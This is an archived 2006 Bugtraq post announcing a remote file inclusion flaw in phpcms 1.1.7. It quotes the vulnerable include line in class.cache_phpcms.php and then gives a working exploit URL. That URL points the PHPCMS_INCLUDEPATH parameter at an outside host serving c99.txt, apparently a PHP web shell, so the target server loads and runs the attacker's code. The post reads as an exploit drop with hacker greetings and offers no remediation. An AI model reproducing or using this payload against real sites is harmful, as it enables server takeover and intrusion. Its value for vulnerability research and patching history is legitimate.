lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061224232820.17295.qmail@securityfocus.com> Date: 24 Dec 2006 23:28:20 -0000 From: Zarloule04@...il.com To: bugtraq@...urityfocus.com Subject: phpcms <=- 1.1.7 Remote File Inclusion #phpcms <=- 1.1.7 Remote File Inclusion #Download Source : #http://phpcms.de/files/phpcms_1_1_7.zip #Found By : b0rizQ #Greetz : Nuck3r + Crack_Man + Red_Casper + RaChidox + Broken-Proxy + S4mi _____________________________________________________ File : class.cache_phpcms.php --Bugs-------------------------------------- include ($PHPCMS_INCLUDEPATH.'/language.'.$DEFAULTS->LANGUAGE ); if ( $DEFAULTS->STATS == 'on' ) -------------------------------------------- Exmple And Methode Exploit : http://www.traget.***/cms/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=http://b0rizq.by.ru/c99.txt? """"""""""www.b0rizQ.Biz"""""""""""""""""""""